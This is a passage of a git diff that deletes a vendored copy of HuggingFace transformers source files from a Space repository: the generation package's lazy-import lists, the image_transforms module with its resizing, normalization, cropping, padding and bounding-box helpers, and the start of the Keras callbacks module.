"MaxTimeCriteria", - "StoppingCriteria", - "StoppingCriteriaList", - "validate_stopping_criteria", - ] - _import_structure["utils"] = [ - "GenerationMixin", - "top_k_top_p_filtering", - "GreedySearchEncoderDecoderOutput", - "GreedySearchDecoderOnlyOutput", - "SampleEncoderDecoderOutput", - "SampleDecoderOnlyOutput", - "BeamSearchEncoderDecoderOutput", - "BeamSearchDecoderOnlyOutput", - "BeamSampleEncoderDecoderOutput", - "BeamSampleDecoderOnlyOutput", - "ContrastiveSearchEncoderDecoderOutput", - "ContrastiveSearchDecoderOnlyOutput", - ] - -try: - if not is_tf_available(): - raise OptionalDependencyNotAvailable() -except OptionalDependencyNotAvailable: - pass -else: - _import_structure["tf_logits_process"] = [ - "TFForcedBOSTokenLogitsProcessor", - "TFForcedEOSTokenLogitsProcessor", - "TFLogitsProcessor", - "TFLogitsProcessorList", - "TFLogitsWarper", - "TFMinLengthLogitsProcessor", - "TFNoBadWordsLogitsProcessor", - "TFNoRepeatNGramLogitsProcessor", - "TFRepetitionPenaltyLogitsProcessor", - "TFTemperatureLogitsWarper", - "TFTopKLogitsWarper", - "TFTopPLogitsWarper", - "TFForceTokensLogitsProcessor", - "TFSuppressTokensAtBeginLogitsProcessor", - "TFSuppressTokensLogitsProcessor", - ] - _import_structure["tf_utils"] = [ - "TFGenerationMixin", - "tf_top_k_top_p_filtering", - "TFGreedySearchDecoderOnlyOutput", - "TFGreedySearchEncoderDecoderOutput", - "TFSampleEncoderDecoderOutput", - "TFSampleDecoderOnlyOutput", - "TFBeamSearchEncoderDecoderOutput", - "TFBeamSearchDecoderOnlyOutput", - "TFBeamSampleEncoderDecoderOutput", - "TFBeamSampleDecoderOnlyOutput", - "TFContrastiveSearchEncoderDecoderOutput", - "TFContrastiveSearchDecoderOnlyOutput", - ] - -try: - if not is_flax_available(): - raise OptionalDependencyNotAvailable() -except OptionalDependencyNotAvailable: - pass -else: - _import_structure["flax_logits_process"] = [ - "FlaxForcedBOSTokenLogitsProcessor", - "FlaxForcedEOSTokenLogitsProcessor", - "FlaxLogitsProcessor", - "FlaxLogitsProcessorList", - "FlaxLogitsWarper", - 
"FlaxMinLengthLogitsProcessor", - "FlaxTemperatureLogitsWarper", - "FlaxTopKLogitsWarper", - "FlaxTopPLogitsWarper", - ] - _import_structure["flax_utils"] = [ - "FlaxGenerationMixin", - "FlaxGreedySearchOutput", - "FlaxSampleOutput", - "FlaxBeamSearchOutput", - ] - -if TYPE_CHECKING: - from .configuration_utils import GenerationConfig - from .streamers import TextIteratorStreamer, TextStreamer - - try: - if not is_torch_available(): - raise OptionalDependencyNotAvailable() - except OptionalDependencyNotAvailable: - pass - else: - from .beam_constraints import Constraint, ConstraintListState, DisjunctiveConstraint, PhrasalConstraint - from .beam_search import BeamHypotheses, BeamScorer, BeamSearchScorer, ConstrainedBeamSearchScorer - from .logits_process import ( - EncoderNoRepeatNGramLogitsProcessor, - EncoderRepetitionPenaltyLogitsProcessor, - EpsilonLogitsWarper, - EtaLogitsWarper, - ExponentialDecayLengthPenalty, - ForcedBOSTokenLogitsProcessor, - ForcedEOSTokenLogitsProcessor, - HammingDiversityLogitsProcessor, - InfNanRemoveLogitsProcessor, - LogitNormalization, - LogitsProcessor, - LogitsProcessorList, - LogitsWarper, - MinLengthLogitsProcessor, - MinNewTokensLengthLogitsProcessor, - NoBadWordsLogitsProcessor, - NoRepeatNGramLogitsProcessor, - PrefixConstrainedLogitsProcessor, - RepetitionPenaltyLogitsProcessor, - TemperatureLogitsWarper, - TopKLogitsWarper, - TopPLogitsWarper, - TypicalLogitsWarper, - ) - from .stopping_criteria import ( - MaxLengthCriteria, - MaxNewTokensCriteria, - MaxTimeCriteria, - StoppingCriteria, - StoppingCriteriaList, - validate_stopping_criteria, - ) - from .utils import ( - BeamSampleDecoderOnlyOutput, - BeamSampleEncoderDecoderOutput, - BeamSearchDecoderOnlyOutput, - BeamSearchEncoderDecoderOutput, - ContrastiveSearchDecoderOnlyOutput, - ContrastiveSearchEncoderDecoderOutput, - GenerationMixin, - GreedySearchDecoderOnlyOutput, - GreedySearchEncoderDecoderOutput, - SampleDecoderOnlyOutput, - SampleEncoderDecoderOutput, - top_k_top_p_filtering, - ) - - try: - if not is_tf_available(): - raise OptionalDependencyNotAvailable() - except OptionalDependencyNotAvailable: - pass - else: - from .tf_logits_process import ( - TFForcedBOSTokenLogitsProcessor, - TFForcedEOSTokenLogitsProcessor, - TFForceTokensLogitsProcessor, - TFLogitsProcessor, - TFLogitsProcessorList, - TFLogitsWarper, - TFMinLengthLogitsProcessor, - TFNoBadWordsLogitsProcessor, - TFNoRepeatNGramLogitsProcessor, - TFRepetitionPenaltyLogitsProcessor, - TFSuppressTokensAtBeginLogitsProcessor, - TFSuppressTokensLogitsProcessor, - TFTemperatureLogitsWarper, - TFTopKLogitsWarper, - TFTopPLogitsWarper, - ) - from .tf_utils import ( - TFBeamSampleDecoderOnlyOutput, - TFBeamSampleEncoderDecoderOutput, - TFBeamSearchDecoderOnlyOutput, - TFBeamSearchEncoderDecoderOutput, - TFContrastiveSearchDecoderOnlyOutput, - TFContrastiveSearchEncoderDecoderOutput, - TFGenerationMixin, - TFGreedySearchDecoderOnlyOutput, - TFGreedySearchEncoderDecoderOutput, - TFSampleDecoderOnlyOutput, - TFSampleEncoderDecoderOutput, - tf_top_k_top_p_filtering, - ) - - try: - if not is_flax_available(): - raise OptionalDependencyNotAvailable() - except OptionalDependencyNotAvailable: - pass - else: - from .flax_logits_process import ( - FlaxForcedBOSTokenLogitsProcessor, - FlaxForcedEOSTokenLogitsProcessor, - FlaxLogitsProcessor, - FlaxLogitsProcessorList, - FlaxLogitsWarper, - FlaxMinLengthLogitsProcessor, - FlaxTemperatureLogitsWarper, - FlaxTopKLogitsWarper, - FlaxTopPLogitsWarper, - ) - from .flax_utils import FlaxBeamSearchOutput, 
FlaxGenerationMixin, FlaxGreedySearchOutput, FlaxSampleOutput -else: - import sys - - sys.modules[__name__] = _LazyModule(__name__, globals()["__file__"], _import_structure, module_spec=__spec__) diff --git a/spaces/chendl/compositional_test/transformers/src/transformers/image_transforms.py b/spaces/chendl/compositional_test/transformers/src/transformers/image_transforms.py deleted file mode 100644 index 369ddc8d4c0057de0c0bb9dbc46f2d5b86f85ed7..0000000000000000000000000000000000000000 --- a/spaces/chendl/compositional_test/transformers/src/transformers/image_transforms.py +++ /dev/null @@ -1,744 +0,0 @@ -# coding=utf-8 -# Copyright 2022 The HuggingFace Inc. team. -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. - -import warnings -from typing import Iterable, List, Optional, Tuple, Union - -import numpy as np - -from .image_utils import ( - ChannelDimension, - ImageInput, - get_channel_dimension_axis, - get_image_size, - infer_channel_dimension_format, - to_numpy_array, -) -from .utils import ExplicitEnum, TensorType, is_jax_tensor, is_tf_tensor, is_torch_tensor -from .utils.import_utils import ( - is_flax_available, - is_tf_available, - is_torch_available, - is_vision_available, - requires_backends, -) - - -if is_vision_available(): - import PIL - - from .image_utils import PILImageResampling - -if is_torch_available(): - import torch - -if is_tf_available(): - import tensorflow as tf - -if is_flax_available(): - import jax.numpy as jnp - - -def to_channel_dimension_format( - image: np.ndarray, - channel_dim: Union[ChannelDimension, str], - input_channel_dim: Optional[Union[ChannelDimension, str]] = None, -) -> np.ndarray: - """ - Converts `image` to the channel dimension format specified by `channel_dim`. - - Args: - image (`numpy.ndarray`): - The image to have its channel dimension set. - channel_dim (`ChannelDimension`): - The channel dimension format to use. - - Returns: - `np.ndarray`: The image with the channel dimension set to `channel_dim`. - """ - if not isinstance(image, np.ndarray): - raise ValueError(f"Input image must be of type np.ndarray, got {type(image)}") - - if input_channel_dim is None: - input_channel_dim = infer_channel_dimension_format(image) - - target_channel_dim = ChannelDimension(channel_dim) - if input_channel_dim == target_channel_dim: - return image - - if target_channel_dim == ChannelDimension.FIRST: - image = image.transpose((2, 0, 1)) - elif target_channel_dim == ChannelDimension.LAST: - image = image.transpose((1, 2, 0)) - else: - raise ValueError("Unsupported channel dimension format: {}".format(channel_dim)) - - return image - - -def rescale( - image: np.ndarray, scale: float, data_format: Optional[ChannelDimension] = None, dtype=np.float32 -) -> np.ndarray: - """ - Rescales `image` by `scale`. - - Args: - image (`np.ndarray`): - The image to rescale. - scale (`float`): - The scale to use for rescaling the image. - data_format (`ChannelDimension`, *optional*): - The channel dimension format of the image. 
If not provided, it will be the same as the input image. - dtype (`np.dtype`, *optional*, defaults to `np.float32`): - The dtype of the output image. Defaults to `np.float32`. Used for backwards compatibility with feature - extractors. - - Returns: - `np.ndarray`: The rescaled image. - """ - if not isinstance(image, np.ndarray): - raise ValueError(f"Input image must be of type np.ndarray, got {type(image)}") - - rescaled_image = image * scale - if data_format is not None: - rescaled_image = to_channel_dimension_format(rescaled_image, data_format) - rescaled_image = rescaled_image.astype(dtype) - return rescaled_image - - -def _rescale_for_pil_conversion(image): - """ - Detects whether or not the image needs to be rescaled before being converted to a PIL image. - - The assumption is that if the image is of type `np.float` and all values are between 0 and 1, it needs to be - rescaled. - """ - if image.dtype == np.uint8: - do_rescale = False - elif np.allclose(image, image.astype(int)): - if np.all(0 <= image) and np.all(image <= 255): - do_rescale = False - else: - raise ValueError( - "The image to be converted to a PIL image contains values outside the range [0, 255], " - f"got [{image.min()}, {image.max()}] which cannot be converted to uint8." - ) - elif np.all(0 <= image) and np.all(image <= 1): - do_rescale = True - else: - raise ValueError( - "The image to be converted to a PIL image contains values outside the range [0, 1], " - f"got [{image.min()}, {image.max()}] which cannot be converted to uint8." - ) - return do_rescale - - -def to_pil_image( - image: Union[np.ndarray, "PIL.Image.Image", "torch.Tensor", "tf.Tensor", "jnp.ndarray"], - do_rescale: Optional[bool] = None, -) -> "PIL.Image.Image": - """ - Converts `image` to a PIL Image. Optionally rescales it and puts the channel dimension back as the last axis if - needed. - - Args: - image (`PIL.Image.Image` or `numpy.ndarray` or `torch.Tensor` or `tf.Tensor`): - The image to convert to the `PIL.Image` format. - do_rescale (`bool`, *optional*): - Whether or not to apply the scaling factor (to make pixel values integers between 0 and 255). Will default - to `True` if the image type is a floating type and casting to `int` would result in a loss of precision, - and `False` otherwise. - - Returns: - `PIL.Image.Image`: The converted image. - """ - requires_backends(to_pil_image, ["vision"]) - - if isinstance(image, PIL.Image.Image): - return image - - # Convert all tensors to numpy arrays before converting to PIL image - if is_torch_tensor(image) or is_tf_tensor(image): - image = image.numpy() - elif is_jax_tensor(image): - image = np.array(image) - elif not isinstance(image, np.ndarray): - raise ValueError("Input image type not supported: {}".format(type(image))) - - # If the channel as been moved to first dim, we put it back at the end. - image = to_channel_dimension_format(image, ChannelDimension.LAST) - - # If there is a single channel, we squeeze it, as otherwise PIL can't handle it. - image = np.squeeze(image, axis=-1) if image.shape[-1] == 1 else image - - # PIL.Image can only store uint8 values so we rescale the image to be between 0 and 255 if needed. 
- do_rescale = _rescale_for_pil_conversion(image) if do_rescale is None else do_rescale - - if do_rescale: - image = rescale(image, 255) - - image = image.astype(np.uint8) - return PIL.Image.fromarray(image) - - -# Logic adapted from torchvision resizing logic: https://github.com/pytorch/vision/blob/511924c1ced4ce0461197e5caa64ce5b9e558aab/torchvision/transforms/functional.py#L366 -def get_resize_output_image_size( - input_image: np.ndarray, - size: Union[int, Tuple[int, int], List[int], Tuple[int]], - default_to_square: bool = True, - max_size: Optional[int] = None, -) -> tuple: - """ - Find the target (height, width) dimension of the output image after resizing given the input image and the desired - size. - - Args: - input_image (`np.ndarray`): - The image to resize. - size (`int` or `Tuple[int, int]` or List[int] or Tuple[int]): - The size to use for resizing the image. If `size` is a sequence like (h, w), output size will be matched to - this. - - If `size` is an int and `default_to_square` is `True`, then image will be resized to (size, size). If - `size` is an int and `default_to_square` is `False`, then smaller edge of the image will be matched to this - number. i.e, if height > width, then image will be rescaled to (size * height / width, size). - default_to_square (`bool`, *optional*, defaults to `True`): - How to convert `size` when it is a single int. If set to `True`, the `size` will be converted to a square - (`size`,`size`). If set to `False`, will replicate - [`torchvision.transforms.Resize`](https://pytorch.org/vision/stable/transforms.html#torchvision.transforms.Resize) - with support for resizing only the smallest edge and providing an optional `max_size`. - max_size (`int`, *optional*): - The maximum allowed for the longer edge of the resized image: if the longer edge of the image is greater - than `max_size` after being resized according to `size`, then the image is resized again so that the longer - edge is equal to `max_size`. As a result, `size` might be overruled, i.e the smaller edge may be shorter - than `size`. Only used if `default_to_square` is `False`. - - Returns: - `tuple`: The target (height, width) dimension of the output image after resizing. - """ - if isinstance(size, (tuple, list)): - if len(size) == 2: - return tuple(size) - elif len(size) == 1: - # Perform same logic as if size was an int - size = size[0] - else: - raise ValueError("size must have 1 or 2 elements if it is a list or tuple") - - if default_to_square: - return (size, size) - - height, width = get_image_size(input_image) - short, long = (width, height) if width <= height else (height, width) - requested_new_short = size - - new_short, new_long = requested_new_short, int(requested_new_short * long / short) - - if max_size is not None: - if max_size <= requested_new_short: - raise ValueError( - f"max_size = {max_size} must be strictly greater than the requested " - f"size for the smaller edge size = {size}" - ) - if new_long > max_size: - new_short, new_long = int(max_size * new_short / new_long), max_size - - return (new_long, new_short) if width <= height else (new_short, new_long) - - -def resize( - image, - size: Tuple[int, int], - resample: "PILImageResampling" = None, - reducing_gap: Optional[int] = None, - data_format: Optional[ChannelDimension] = None, - return_numpy: bool = True, -) -> np.ndarray: - """ - Resizes `image` to `(height, width)` specified by `size` using the PIL library. - - Args: - image (`PIL.Image.Image` or `np.ndarray` or `torch.Tensor`): - The image to resize. 
- size (`Tuple[int, int]`): - The size to use for resizing the image. - resample (`int`, *optional*, defaults to `PILImageResampling.BILINEAR`): - The filter to user for resampling. - reducing_gap (`int`, *optional*): - Apply optimization by resizing the image in two steps. The bigger `reducing_gap`, the closer the result to - the fair resampling. See corresponding Pillow documentation for more details. - data_format (`ChannelDimension`, *optional*): - The channel dimension format of the output image. If unset, will use the inferred format from the input. - return_numpy (`bool`, *optional*, defaults to `True`): - Whether or not to return the resized image as a numpy array. If False a `PIL.Image.Image` object is - returned. - - Returns: - `np.ndarray`: The resized image. - """ - requires_backends(resize, ["vision"]) - - resample = resample if resample is not None else PILImageResampling.BILINEAR - - if not len(size) == 2: - raise ValueError("size must have 2 elements") - - # For all transformations, we want to keep the same data format as the input image unless otherwise specified. - # The resized image from PIL will always have channels last, so find the input format first. - data_format = infer_channel_dimension_format(image) if data_format is None else data_format - - # To maintain backwards compatibility with the resizing done in previous image feature extractors, we use - # the pillow library to resize the image and then convert back to numpy - do_rescale = False - if not isinstance(image, PIL.Image.Image): - do_rescale = _rescale_for_pil_conversion(image) - image = to_pil_image(image, do_rescale=do_rescale) - height, width = size - # PIL images are in the format (width, height) - resized_image = image.resize((width, height), resample=resample, reducing_gap=reducing_gap) - - if return_numpy: - resized_image = np.array(resized_image) - # If the input image channel dimension was of size 1, then it is dropped when converting to a PIL image - # so we need to add it back if necessary. - resized_image = np.expand_dims(resized_image, axis=-1) if resized_image.ndim == 2 else resized_image - # The image is always in channels last format after converting from a PIL image - resized_image = to_channel_dimension_format( - resized_image, data_format, input_channel_dim=ChannelDimension.LAST - ) - # If an image was rescaled to be in the range [0, 255] before converting to a PIL image, then we need to - # rescale it back to the original range. - resized_image = rescale(resized_image, 1 / 255) if do_rescale else resized_image - return resized_image - - -def normalize( - image: np.ndarray, - mean: Union[float, Iterable[float]], - std: Union[float, Iterable[float]], - data_format: Optional[ChannelDimension] = None, -) -> np.ndarray: - """ - Normalizes `image` using the mean and standard deviation specified by `mean` and `std`. - - image = (image - mean) / std - - Args: - image (`np.ndarray`): - The image to normalize. - mean (`float` or `Iterable[float]`): - The mean to use for normalization. - std (`float` or `Iterable[float]`): - The standard deviation to use for normalization. - data_format (`ChannelDimension`, *optional*): - The channel dimension format of the output image. If unset, will use the inferred format from the input. - """ - requires_backends(normalize, ["vision"]) - - if isinstance(image, PIL.Image.Image): - warnings.warn( - "PIL.Image.Image inputs are deprecated and will be removed in v4.26.0. 
Please use numpy arrays instead.", - FutureWarning, - ) - # Convert PIL image to numpy array with the same logic as in the previous feature extractor normalize - - # casting to numpy array and dividing by 255. - image = to_numpy_array(image) - image = rescale(image, scale=1 / 255) - - if not isinstance(image, np.ndarray): - raise ValueError("image must be a numpy array") - - input_data_format = infer_channel_dimension_format(image) - channel_axis = get_channel_dimension_axis(image) - num_channels = image.shape[channel_axis] - - if isinstance(mean, Iterable): - if len(mean) != num_channels: - raise ValueError(f"mean must have {num_channels} elements if it is an iterable, got {len(mean)}") - else: - mean = [mean] * num_channels - mean = np.array(mean, dtype=image.dtype) - - if isinstance(std, Iterable): - if len(std) != num_channels: - raise ValueError(f"std must have {num_channels} elements if it is an iterable, got {len(std)}") - else: - std = [std] * num_channels - std = np.array(std, dtype=image.dtype) - - if input_data_format == ChannelDimension.LAST: - image = (image - mean) / std - else: - image = ((image.T - mean) / std).T - - image = to_channel_dimension_format(image, data_format) if data_format is not None else image - return image - - -def center_crop( - image: np.ndarray, - size: Tuple[int, int], - data_format: Optional[Union[str, ChannelDimension]] = None, - return_numpy: Optional[bool] = None, -) -> np.ndarray: - """ - Crops the `image` to the specified `size` using a center crop. Note that if the image is too small to be cropped to - the size given, it will be padded (so the returned result will always be of size `size`). - - Args: - image (`np.ndarray`): - The image to crop. - size (`Tuple[int, int]`): - The target size for the cropped image. - data_format (`str` or `ChannelDimension`, *optional*): - The channel dimension format for the output image. Can be one of: - - `"channels_first"` or `ChannelDimension.FIRST`: image in (num_channels, height, width) format. - - `"channels_last"` or `ChannelDimension.LAST`: image in (height, width, num_channels) format. - If unset, will use the inferred format of the input image. - return_numpy (`bool`, *optional*): - Whether or not to return the cropped image as a numpy array. Used for backwards compatibility with the - previous ImageFeatureExtractionMixin method. - - Unset: will return the same type as the input image. - - `True`: will return a numpy array. - - `False`: will return a `PIL.Image.Image` object. - Returns: - `np.ndarray`: The cropped image. - """ - requires_backends(center_crop, ["vision"]) - - if isinstance(image, PIL.Image.Image): - warnings.warn( - "PIL.Image.Image inputs are deprecated and will be removed in v4.26.0. 
Please use numpy arrays instead.", - FutureWarning, - ) - image = to_numpy_array(image) - return_numpy = False if return_numpy is None else return_numpy - else: - return_numpy = True if return_numpy is None else return_numpy - - if not isinstance(image, np.ndarray): - raise ValueError(f"Input image must be of type np.ndarray, got {type(image)}") - - if not isinstance(size, Iterable) or len(size) != 2: - raise ValueError("size must have 2 elements representing the height and width of the output image") - - input_data_format = infer_channel_dimension_format(image) - output_data_format = data_format if data_format is not None else input_data_format - - # We perform the crop in (C, H, W) format and then convert to the output format - image = to_channel_dimension_format(image, ChannelDimension.FIRST) - - orig_height, orig_width = get_image_size(image) - crop_height, crop_width = size - crop_height, crop_width = int(crop_height), int(crop_width) - - # In case size is odd, (image_shape[0] + size[0]) // 2 won't give the proper result. - top = (orig_height - crop_height) // 2 - bottom = top + crop_height - # In case size is odd, (image_shape[1] + size[1]) // 2 won't give the proper result. - left = (orig_width - crop_width) // 2 - right = left + crop_width - - # Check if cropped area is within image boundaries - if top >= 0 and bottom <= orig_height and left >= 0 and right <= orig_width: - image = image[..., top:bottom, left:right] - image = to_channel_dimension_format(image, output_data_format) - return image - - # Otherwise, we may need to pad if the image is too small. Oh joy... - new_height = max(crop_height, orig_height) - new_width = max(crop_width, orig_width) - new_shape = image.shape[:-2] + (new_height, new_width) - new_image = np.zeros_like(image, shape=new_shape) - - # If the image is too small, pad it with zeros - top_pad = (new_height - orig_height) // 2 - bottom_pad = top_pad + orig_height - left_pad = (new_width - orig_width) // 2 - right_pad = left_pad + orig_width - new_image[..., top_pad:bottom_pad, left_pad:right_pad] = image - - top += top_pad - bottom += top_pad - left += left_pad - right += left_pad - - new_image = new_image[..., max(0, top) : min(new_height, bottom), max(0, left) : min(new_width, right)] - new_image = to_channel_dimension_format(new_image, output_data_format) - - if not return_numpy: - new_image = to_pil_image(new_image) - - return new_image - - -def _center_to_corners_format_torch(bboxes_center: "torch.Tensor") -> "torch.Tensor": - center_x, center_y, width, height = bboxes_center.unbind(-1) - bbox_corners = torch.stack( - # top left x, top left y, bottom right x, bottom right y - [(center_x - 0.5 * width), (center_y - 0.5 * height), (center_x + 0.5 * width), (center_y + 0.5 * height)], - dim=-1, - ) - return bbox_corners - - -def _center_to_corners_format_numpy(bboxes_center: np.ndarray) -> np.ndarray: - center_x, center_y, width, height = bboxes_center.T - bboxes_corners = np.stack( - # top left x, top left y, bottom right x, bottom right y - [center_x - 0.5 * width, center_y - 0.5 * height, center_x + 0.5 * width, center_y + 0.5 * height], - axis=-1, - ) - return bboxes_corners - - -def _center_to_corners_format_tf(bboxes_center: "tf.Tensor") -> "tf.Tensor": - center_x, center_y, width, height = tf.unstack(bboxes_center, axis=-1) - bboxes_corners = tf.stack( - # top left x, top left y, bottom right x, bottom right y - [center_x - 0.5 * width, center_y - 0.5 * height, center_x + 0.5 * width, center_y + 0.5 * height], - axis=-1, - ) - return bboxes_corners 
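For intuition, here is a minimal, self-contained sketch of the same center-to-corners conversion that the numpy helper above performs; it is illustrative only and assumes nothing beyond numpy:

```py
import numpy as np

# One box in center format: (center_x, center_y, width, height)
boxes_center = np.array([[0.5, 0.5, 0.2, 0.4]])

center_x, center_y, width, height = boxes_center.T
boxes_corners = np.stack(
    [center_x - 0.5 * width, center_y - 0.5 * height, center_x + 0.5 * width, center_y + 0.5 * height],
    axis=-1,
)
print(boxes_corners)  # [[0.4 0.3 0.6 0.7]] -> (top_left_x, top_left_y, bottom_right_x, bottom_right_y)
```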
- - -# 2 functions below inspired by https://github.com/facebookresearch/detr/blob/master/util/box_ops.py -def center_to_corners_format(bboxes_center: TensorType) -> TensorType: - """ - Converts bounding boxes from center format to corners format. - - center format: contains the coordinate for the center of the box and its width, height dimensions - (center_x, center_y, width, height) - corners format: contains the coordinates for the top-left and bottom-right corners of the box - (top_left_x, top_left_y, bottom_right_x, bottom_right_y) - """ - # Function is used during model forward pass, so we use the input framework if possible, without - # converting to numpy - if is_torch_tensor(bboxes_center): - return _center_to_corners_format_torch(bboxes_center) - elif isinstance(bboxes_center, np.ndarray): - return _center_to_corners_format_numpy(bboxes_center) - elif is_tf_tensor(bboxes_center): - return _center_to_corners_format_tf(bboxes_center) - - raise ValueError(f"Unsupported input type {type(bboxes_center)}") - - -def _corners_to_center_format_torch(bboxes_corners: "torch.Tensor") -> "torch.Tensor": - top_left_x, top_left_y, bottom_right_x, bottom_right_y = bboxes_corners.unbind(-1) - b = [ - (top_left_x + bottom_right_x) / 2, # center x - (top_left_y + bottom_right_y) / 2, # center y - (bottom_right_x - top_left_x), # width - (bottom_right_y - top_left_y), # height - ] - return torch.stack(b, dim=-1) - - -def _corners_to_center_format_numpy(bboxes_corners: np.ndarray) -> np.ndarray: - top_left_x, top_left_y, bottom_right_x, bottom_right_y = bboxes_corners.T - bboxes_center = np.stack( - [ - (top_left_x + bottom_right_x) / 2, # center x - (top_left_y + bottom_right_y) / 2, # center y - (bottom_right_x - top_left_x), # width - (bottom_right_y - top_left_y), # height - ], - axis=-1, - ) - return bboxes_center - - -def _corners_to_center_format_tf(bboxes_corners: "tf.Tensor") -> "tf.Tensor": - top_left_x, top_left_y, bottom_right_x, bottom_right_y = tf.unstack(bboxes_corners, axis=-1) - bboxes_center = tf.stack( - [ - (top_left_x + bottom_right_x) / 2, # center x - (top_left_y + bottom_right_y) / 2, # center y - (bottom_right_x - top_left_x), # width - (bottom_right_y - top_left_y), # height - ], - axis=-1, - ) - return bboxes_center - - -def corners_to_center_format(bboxes_corners: TensorType) -> TensorType: - """ - Converts bounding boxes from corners format to center format. - - corners format: contains the coordinates for the top-left and bottom-right corners of the box - (top_left_x, top_left_y, bottom_right_x, bottom_right_y) - center format: contains the coordinate for the center of the box and its width, height dimensions - (center_x, center_y, width, height) - """ - # Inverse function accepts different input types so implemented here too - if is_torch_tensor(bboxes_corners): - return _corners_to_center_format_torch(bboxes_corners) - elif isinstance(bboxes_corners, np.ndarray): - return _corners_to_center_format_numpy(bboxes_corners) - elif is_tf_tensor(bboxes_corners): - return _corners_to_center_format_tf(bboxes_corners) - - raise ValueError(f"Unsupported input type {type(bboxes_corners)}") - - -# 2 functions below copied from https://github.com/cocodataset/panopticapi/blob/master/panopticapi/utils.py - # Copyright (c) 2018, Alexander Kirillov - # All rights reserved. -def rgb_to_id(color): - """ - Converts RGB color to unique ID. 
- """ - if isinstance(color, np.ndarray) and len(color.shape) == 3: - if color.dtype == np.uint8: - color = color.astype(np.int32) - return color[:, :, 0] + 256 * color[:, :, 1] + 256 * 256 * color[:, :, 2] - return int(color[0] + 256 * color[1] + 256 * 256 * color[2]) - - -def id_to_rgb(id_map): - """ - Converts unique ID to RGB color. - """ - if isinstance(id_map, np.ndarray): - id_map_copy = id_map.copy() - rgb_shape = tuple(list(id_map.shape) + [3]) - rgb_map = np.zeros(rgb_shape, dtype=np.uint8) - for i in range(3): - rgb_map[..., i] = id_map_copy % 256 - id_map_copy //= 256 - return rgb_map - color = [] - for _ in range(3): - color.append(id_map % 256) - id_map //= 256 - return color - - -class PaddingMode(ExplicitEnum): - """ - Enum class for the different padding modes to use when padding images. - """ - - CONSTANT = "constant" - REFLECT = "reflect" - REPLICATE = "replicate" - SYMMETRIC = "symmetric" - - -def pad( - image: np.ndarray, - padding: Union[int, Tuple[int, int], Iterable[Tuple[int, int]]], - mode: PaddingMode = PaddingMode.CONSTANT, - constant_values: Union[float, Iterable[float]] = 0.0, - data_format: Optional[Union[str, ChannelDimension]] = None, - input_data_format: Optional[Union[str, ChannelDimension]] = None, -) -> np.ndarray: - """ - Pads the `image` with the specified (height, width) `padding` and `mode`. - - Args: - image (`np.ndarray`): - The image to pad. - padding (`int` or `Tuple[int, int]` or `Iterable[Tuple[int, int]]`): - Padding to apply to the edges of the height, width axes. Can be one of three formats: - - `((before_height, after_height), (before_width, after_width))` unique pad widths for each axis. - - `((before, after),)` yields same before and after pad for height and width. - - `(pad,)` or int is a shortcut for before = after = pad width for all axes. - mode (`PaddingMode`): - The padding mode to use. Can be one of: - - `"constant"`: pads with a constant value. - - `"reflect"`: pads with the reflection of the vector mirrored on the first and last values of the - vector along each axis. - - `"replicate"`: pads with the replication of the last value on the edge of the array along each axis. - - `"symmetric"`: pads with the reflection of the vector mirrored along the edge of the array. - constant_values (`float` or `Iterable[float]`, *optional*): - The value to use for the padding if `mode` is `"constant"`. - data_format (`str` or `ChannelDimension`, *optional*): - The channel dimension format for the output image. Can be one of: - - `"channels_first"` or `ChannelDimension.FIRST`: image in (num_channels, height, width) format. - - `"channels_last"` or `ChannelDimension.LAST`: image in (height, width, num_channels) format. - If unset, will use same as the input image. - input_data_format (`str` or `ChannelDimension`, *optional*): - The channel dimension format for the input image. Can be one of: - - `"channels_first"` or `ChannelDimension.FIRST`: image in (num_channels, height, width) format. - - `"channels_last"` or `ChannelDimension.LAST`: image in (height, width, num_channels) format. - If unset, will use the inferred format of the input image. - - Returns: - `np.ndarray`: The padded image. - - """ - if input_data_format is None: - input_data_format = infer_channel_dimension_format(image) - - def _expand_for_data_format(values): - """ - Convert values to be in the format expected by np.pad based on the data format. 
- """ - if isinstance(values, (int, float)): - values = ((values, values), (values, values)) - elif isinstance(values, tuple) and len(values) == 1: - values = ((values[0], values[0]), (values[0], values[0])) - elif isinstance(values, tuple) and len(values) == 2 and isinstance(values[0], int): - values = (values, values) - elif isinstance(values, tuple) and len(values) == 2 and isinstance(values[0], tuple): - values = values - else: - raise ValueError(f"Unsupported format: {values}") - - # add 0 for channel dimension - values = ((0, 0), *values) if input_data_format == ChannelDimension.FIRST else (*values, (0, 0)) - - # Add additional padding if there's a batch dimension - values = (0, *values) if image.ndim == 4 else values - return values - - padding = _expand_for_data_format(padding) - - if mode == PaddingMode.CONSTANT: - constant_values = _expand_for_data_format(constant_values) - image = np.pad(image, padding, mode="constant", constant_values=constant_values) - elif mode == PaddingMode.REFLECT: - image = np.pad(image, padding, mode="reflect") - elif mode == PaddingMode.REPLICATE: - image = np.pad(image, padding, mode="edge") - elif mode == PaddingMode.SYMMETRIC: - image = np.pad(image, padding, mode="symmetric") - else: - raise ValueError(f"Invalid padding mode: {mode}") - - image = to_channel_dimension_format(image, data_format) if data_format is not None else image - return image - - -# TODO (Amy): Accept 1/3/4 channel numpy array as input and return np.array as default -def convert_to_rgb(image: ImageInput) -> ImageInput: - """ - Converts an image to RGB format. Only converts if the image is of type PIL.Image.Image, otherwise returns the image - as is. - - Args: - image (Image): - The image to convert. - """ - requires_backends(convert_to_rgb, ["vision"]) - - if not isinstance(image, PIL.Image.Image): - return image - - image = image.convert("RGB") - return image diff --git a/spaces/chendl/compositional_test/transformers/src/transformers/keras_callbacks.py b/spaces/chendl/compositional_test/transformers/src/transformers/keras_callbacks.py deleted file mode 100644 index a9d75c9aeeaa7f58997f18f80ded709c23af4d4e..0000000000000000000000000000000000000000 --- a/spaces/chendl/compositional_test/transformers/src/transformers/keras_callbacks.py +++ /dev/null @@ -1,414 +0,0 @@ -import logging -import os -from pathlib import Path -from time import sleep -from typing import Callable, List, Optional, Union - -import numpy as np -import tensorflow as tf -from huggingface_hub import Repository, create_repo -from packaging.version import parse -from tensorflow.keras.callbacks import Callback - -from . import IntervalStrategy, PreTrainedTokenizerBase -from .modelcard import TrainingSummary -from .utils import get_full_repo_name - - -logger = logging.getLogger(__name__) - - -class KerasMetricCallback(Callback): - """ - Callback to compute metrics at the end of 